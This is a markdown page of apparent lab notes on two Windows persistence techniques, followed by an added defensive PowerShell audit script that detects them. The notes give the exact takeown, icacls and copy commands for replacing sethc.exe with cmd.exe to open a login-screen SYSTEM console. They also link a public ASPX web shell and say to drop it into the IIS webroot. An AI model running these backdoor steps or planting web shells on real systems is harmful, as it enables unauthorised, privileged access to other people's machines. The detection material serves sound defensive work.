using-web-shells.md

File metadata and controls

35 lines (28 loc) · 1.88 KB

Using Web Shells

  • After pressing SHIFT 5 times, Windows will execute the binary at C:\Windows\System32\sethc.exe.
  • If we are able to replace that binary with a payload of our preference, we can then trigger it with the shortcut. Interestingly, this even works from the login screen, before entering any credentials.
  • A straightforward way to backdoor the login screen is to replace sethc.exe with a copy of cmd.exe.
  • That way, we can spawn a console using the sticky keys shortcut, even from the login screen.
  • To overwrite sethc.exe, we first need to take ownership of the file and grant our current user permission to modify it.
  • Only then will we be able to replace it with a copy of cmd.exe. We can do so with the following commands:

```
takeown /f c:\Windows\System32\sethc.exe

SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "PURECHAOS\Administrator".

icacls C:\Windows\System32\sethc.exe /grant Administrator:F
processed file: C:\Windows\System32\sethc.exe
Successfully processed 1 files; Failed processing 0 files

copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Overwrite C:\Windows\System32\sethc.exe? (Yes/No/All): yes
        1 file(s) copied.
```

  • After doing so, lock your session from the start menu.
  • You should now be able to press SHIFT five times to access a terminal with SYSTEM privileges directly from the login screen.
  • If you notice the compromised target is hosting a web server, we can take advantage of this.
  • Download an ASP.NET web shell, for example:
  • https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx
  • Transfer it to the victim machine and move it into the webroot, which by default is located in the C:\inetpub\wwwroot directory:

```
move shell.aspx C:\inetpub\wwwroot\
```

  • We can then run commands from the web server by pointing to the following URL:
  • http://MACHINE_IP/shell.aspx
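The following is an added defensive audit script, not part of the original notes or of the linked webshell repository. It checks a host for the artefacts the two techniques above leave behind: a sethc.exe that is byte-identical to cmd.exe or whose version resource names a different binary, a sethc.exe owner or ACL changed by takeown/icacls, and ASP.NET script files in the default webroot that were created recently or contain process-execution code. The paths are the defaults named on this page; the 30-day window, the content pattern and the function names are assumptions of the example.

```powershell
# Added defensive audit for the two persistence techniques in these notes: sethc.exe swapped for
# cmd.exe, and an .aspx web shell dropped into the IIS webroot. Example code, not part of the
# original notes. Run from an elevated PowerShell prompt on the host being checked.
# Paths are the defaults the notes use; the NewerThanDays window and the content regex are
# assumptions of this example, not documented thresholds.

function Test-StickyKeysBackdoor {
    param(
        [string]$Sethc = 'C:\Windows\System32\sethc.exe',
        [string]$Cmd   = 'C:\Windows\System32\cmd.exe'
    )
    $findings = @()

    # 1. A plain copy of cmd.exe over sethc.exe is byte-identical to cmd.exe.
    $sethcHash = (Get-FileHash -Path $Sethc -Algorithm SHA256).Hash
    $cmdHash   = (Get-FileHash -Path $Cmd   -Algorithm SHA256).Hash
    if ($sethcHash -eq $cmdHash) {
        $findings += 'sethc.exe is byte-identical to cmd.exe'
    }

    # 2. The version resource keeps the binary's real name, so a renamed copy of any other
    #    Windows binary is caught even though it still carries a valid Microsoft signature.
    $origName = (Get-Item -Path $Sethc).VersionInfo.OriginalFilename
    if ($origName -and $origName -notlike 'sethc*') {
        $findings += "sethc.exe version info reports OriginalFilename '$origName'"
    }

    # 3. takeown moves ownership away from TrustedInstaller and icacls /grant leaves an explicit
    #    ACE behind; on a default install only TrustedInstaller has write rights on this file.
    $acl = Get-Acl -Path $Sethc
    if ($acl.Owner -ne 'NT SERVICE\TrustedInstaller') {
        $findings += "sethc.exe owner is '$($acl.Owner)' instead of NT SERVICE\TrustedInstaller"
    }
    $writers = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -ne 'NT SERVICE\TrustedInstaller' -and
        $_.FileSystemRights.ToString() -match 'FullControl|Modify|Write'
    }
    foreach ($ace in $writers) {
        $findings += "write access on sethc.exe granted to $($ace.IdentityReference.Value): $($ace.FileSystemRights)"
    }

    return $findings
}

function Find-SuspiciousWebFiles {
    param(
        [string]$WebRoot = 'C:\inetpub\wwwroot',
        [int]$NewerThanDays = 30
    )
    $findings = @()
    if (-not (Test-Path -Path $WebRoot)) { return $findings }   # no IIS webroot, nothing to check

    $cutoff = (Get-Date).AddDays(-$NewerThanDays)
    # Content markers typical of command-execution web shells such as cmdasp.aspx.
    # A heuristic for triage, not a signature.
    $pattern = 'cmd\.exe|System\.Diagnostics\.Process|ProcessStartInfo'

    $scripts = Get-ChildItem -Path $WebRoot -Recurse -File |
        Where-Object { $_.Extension -in '.aspx', '.asp', '.ashx', '.asmx' }

    foreach ($file in $scripts) {
        $reasons = @()
        if ($file.CreationTime -gt $cutoff) {
            $reasons += "created $($file.CreationTime)"
        }
        if (Select-String -Path $file.FullName -Pattern $pattern -Quiet) {
            $reasons += 'contains process-execution code'
        }
        if ($reasons.Count -gt 0) {
            $findings += "$($file.FullName): $($reasons -join ', ')"
        }
    }
    return $findings
}

# Run both checks and print a short report.
$report = @()
$report += Test-StickyKeysBackdoor
$report += Find-SuspiciousWebFiles
if ($report.Count -eq 0) {
    'No indicators of the sticky keys or web shell persistence described in these notes.'
} else {
    $report | ForEach-Object { "[!] $_" }
}
```

A hit on check 1 or 2 is a strong indicator; a hit on check 3 alone can also come from legitimate servicing, so treat it as a reason to look at the file rather than as proof. The web file check lists candidates for review; a freshly deployed application will produce recent .aspx files too, so compare the list against what the web team expects to be in the webroot.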